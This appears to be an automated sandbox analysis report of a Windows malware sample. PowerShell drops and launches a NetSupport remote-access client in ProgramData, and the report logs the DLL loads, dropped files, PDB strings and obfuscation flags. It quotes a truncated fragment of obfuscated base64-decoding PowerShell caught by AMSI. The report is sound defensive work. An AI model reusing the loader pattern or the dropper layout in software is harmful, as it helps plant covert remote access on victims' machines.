Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: certca.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: dsparse.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: dpapi.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: windowscodecs.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: threadpoolwinrt.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: dwmapi.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: ninput.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: msvcp140.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: vcruntime140_1.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: vcruntime140.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: vcruntime140.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: vcruntime140_1.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: twinapi.appcore.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: wintypes.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: rometadata.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: windows.storage.applicationdata.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: windows.storage.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: wldp.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: propsys.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: uxtheme.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: appcontracts.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: windows.applicationmodel.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: cdprt.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: cdp.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: umpdc.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: dsreg.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: msvcp110_win.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: cryptsp.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: capauthz.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: msasn1.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: ntmarta.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: windows.staterepositorycore.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: windows.shell.servicehostbuilder.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: ondemandbrokerclient.dll
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Section loaded: psfruntime64.dll
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Section loaded: windows.storage.dll
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Section loaded: wldp.dll
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Section loaded: daxexec.dll
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Section loaded: fltlib.dll
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Section loaded: profapi.dll
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Section loaded: container.dll
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Section loaded: appxdeploymentclient.dll

Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32

Jump to behavior

Source: Google Drive.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File written: C:\ProgramData\netsupport\client\client32.ini

Jump to behavior

Source: C:\ProgramData\netsupport\client\client32.exe

File opened: C:\Windows\SysWOW64\riched32.dll

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\ProgramData\netsupport\client\msvcr100.dll

Jump to behavior

Source:	Binary string: D:\a\1\s\x64\Release\PsfLauncher64.pdb source: PsfLauncher64.exe, 00000014.00000000.1745032807.00007FF6C367E000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: D:\a\1\s\x64\Release\PsfRuntime64.pdb source: PsfRunDll64.exe, 00000016.00000002.1749156584.00007FFA1B0EF000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: powershell.exe, 0000001A.00000002.1968531120.0000023162F35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162F1C000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000020.00000002.2653892978.000000006C1B2000.00000002.00000001.01000000.00000019.sdmp, PCICHEK.DLL.26.dr
Source:	Binary string: msvcr100.i386.pdb source: powershell.exe, 0000001A.00000002.1968531120.00000231631AF000.00000004.00000800.00020000.00000000.sdmp, client32.exe, client32.exe, 00000020.00000002.2639330298.000000006C0F1000.00000020.00000001.01000000.0000001A.sdmp, msvcr100.dll.26.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmp, PCICL32.DLL.26.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: powershell.exe, 0000001A.00000002.1968531120.0000023162F35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162F1C000.00000004.00000800.00020000.00000000.sdmp, PCICHEK.DLL.26.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: powershell.exe, 0000001A.00000002.1968531120.0000023162E0E000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000020.00000002.2636652234.000000006BEF0000.00000002.00000001.01000000.0000001B.sdmp, HTCTL32.DLL.26.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\AudioCapture\Release\AudioCapture.pdb source: powershell.exe, 0000001A.00000002.1968531120.0000023162D8C000.00000004.00000800.00020000.00000000.sdmp, AudioCapture.dll.26.dr
Source:	Binary string: client32_ctr.pdb0\1100\client32\Release\client32_ctr.pdbP source: powershell.exe, 0000001A.00000002.1968531120.0000023163150000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163131000.00000004.00000800.00020000.00000000.sdmp, client32.exe.26.dr
Source:	Binary string: client32_ctr.pdb source: powershell.exe, 0000001A.00000002.1968531120.0000023163150000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163131000.00000004.00000800.00020000.00000000.sdmp, client32.exe.26.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\release\tcctl32.pdbP source: powershell.exe, 0000001A.00000002.1968531120.000002316309F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.26.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: powershell.exe, 0000001A.00000002.1968531120.0000023162E0E000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000020.00000002.2636652234.000000006BEF0000.00000002.00000001.01000000.0000001B.sdmp, HTCTL32.DLL.26.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: powershell.exe, 0000001A.00000002.1968531120.0000023163353000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000020.00000002.2654970934.0000000074675000.00000002.00000001.01000000.00000018.sdmp, pcicapi.dll.26.dr
Source:	Binary string: D:\a\1\s\x64\Release\PsfRunDll64.pdb source: PsfRunDll64.exe, 00000016.00000000.1747207751.00007FF695D50000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: 0\1100\client32\Release\client32_ctr.pdb source: powershell.exe, 0000001A.00000002.1968531120.0000023163150000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163131000.00000004.00000800.00020000.00000000.sdmp, client32.exe.26.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\release\tcctl32.pdb source: powershell.exe, 0000001A.00000002.1968531120.000002316309F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.26.dr
Source:	Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 0000001A.00000002.2187481682.00000231793A5000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($UbzXTvljYeqTglbzWFYnHcYrl)) $djCLjZagYgaEPajHwbPPt = "usradm" if ($uxuQItyI.Contains($djCLjZagYgaEPajHwbPPt)) { try { $oXtyKRiEpmXFEtumyER
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($UbzXTvljYeqTglbzWFYnHcYrl)) $djCLjZagYgaEPajHwbPPt = "usradm" if ($uxuQItyI.Contains($djCLjZagYgaEPajHwbPPt)) { try { $oXtyKRiEpmXFEtumyER

Contains functionality to dynamically determine API calls

Source: C:\ProgramData\netsupport\client\client32.exe

Code function: 32_2_11029200 GetTickCount,LoadLibraryA,GetProcAddress,InternetCloseHandle,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,HttpOpenRequestA,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,

32_2_11029200

PE file contains sections with non-standard names

Source: PCICL32.DLL.26.dr

Static PE information: section name: .hhshare

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BAF4636C push ds; ret	23_2_00007FF9BAF4636F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB1A46DC push ds; retf	23_2_00007FF9BB1A474F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB1A6FA5 pushad ; retf	23_2_00007FF9BB1A6FA6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB1A6EBD push eax; retf	23_2_00007FF9BB1A6EBE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB5447F5 push ebx; iretd	23_2_00007FF9BB5447FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB6A282A pushad ; iretd	23_2_00007FF9BB6A2832
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB6912D0 pushad ; ret	23_2_00007FF9BB6912E4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB6962BC pushad ; ret	23_2_00007FF9BB6962B4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB69629C pushad ; ret	23_2_00007FF9BB6962B4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB6980FC push ebx; ret	23_2_00007FF9BB69813A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BAF68133 push ebx; ret	25_2_00007FF9BAF6813A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB1C4C8E push eax; iretd	25_2_00007FF9BB1C4C8F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB1C7BD4 push esi; ret	25_2_00007FF9BB1C7BD7
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB1C46DC push ds; retf	25_2_00007FF9BB1C474F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB1C4D76 pushad ; iretd	25_2_00007FF9BB1C4D77
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB3F33A1 push edi; retf	25_2_00007FF9BB3F33A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB575776 pushad ; retf	25_2_00007FF9BB5759DD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB5758FF pushad ; retf	25_2_00007FF9BB5759DD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB572CE0 push esp; retf	25_2_00007FF9BB572CE1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB77225B push ds; retf	25_2_00007FF9BB77226D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB77325B push cs; retf	25_2_00007FF9BB773272
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB770E78 push ds; retf	25_2_00007FF9BB770E79
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB770299 push ds; retf	25_2_00007FF9BB77029F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB7725DF push es; retf	25_2_00007FF9BB7725EF
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB7721F7 push ds; retf	25_2_00007FF9BB7721F8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB7731FC push cs; retf	25_2_00007FF9BB7731FD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB771017 push ss; retf	25_2_00007FF9BB771018
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB771625 push ss; retf	25_2_00007FF9BB771626
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB77082E push ds; retf	25_2_00007FF9BB770832
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB772037 push es; retf	25_2_00007FF9BB77203B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB771836 push cs; retf	25_2_00007FF9BB77183A

Source: msvcr100.dll.26.dr

Static PE information: section name: .text entropy: 6.909044922675825

Drops PE files

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\netsupport\client\PCICHEK.DLL	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\netsupport\client\msvcr100.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\netsupport\client\AudioCapture.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\netsupport\client\TCCTL32.DLL	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\netsupport\client\remcmdstub.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\netsupport\client\client32.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\netsupport\client\pcicapi.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\netsupport\client\PCICL32.DLL	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\netsupport\client\HTCTL32.DLL	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\netsupport\client\PCICHEK.DLL	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\netsupport\client\msvcr100.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\netsupport\client\AudioCapture.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\netsupport\client\TCCTL32.DLL	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\netsupport\client\remcmdstub.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\netsupport\client\client32.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\netsupport\client\pcicapi.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\netsupport\client\PCICL32.DLL	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\netsupport\client\HTCTL32.DLL	Jump to dropped file

Source: C:\ProgramData\netsupport\client\client32.exe

Code function: 32_2_6BEC7030 ctl_open,LoadLibraryA,InitializeCriticalSection,CreateEventA,CreateEventA,CreateEventA,CreateEventA,WSAStartup,_malloc,_memset,_calloc,_malloc,_memset,_malloc,_memset,GetTickCount,CreateThread,SetThreadPriority,GetModuleFileNameA,GetPrivateProfileIntA,GetModuleHandleA,CreateMutexA,timeBeginPeriod,

32_2_6BEC7030

Stores files to the Windows start menu directory

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	Jump to behavior

Source: C:\ProgramData\netsupport\client\client32.exe

32_2_11124DC0

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Tries to open files direct via NTFS file id

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: NULL			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: NULL			Jump to behavior

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_111365D0 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary,	32_2_111365D0
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_11157150 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,	32_2_11157150
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_11157150 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,	32_2_11157150
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_11025180 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,	32_2_11025180
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_11157550 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,	32_2_11157550
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_110255D0 IsIconic,BringWindowToTop,GetCurrentThreadId,	32_2_110255D0
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_1110F720 IsIconic,GetTickCount,	32_2_1110F720
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_1111F990 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,	32_2_1111F990
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_1111F990 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,	32_2_1111F990
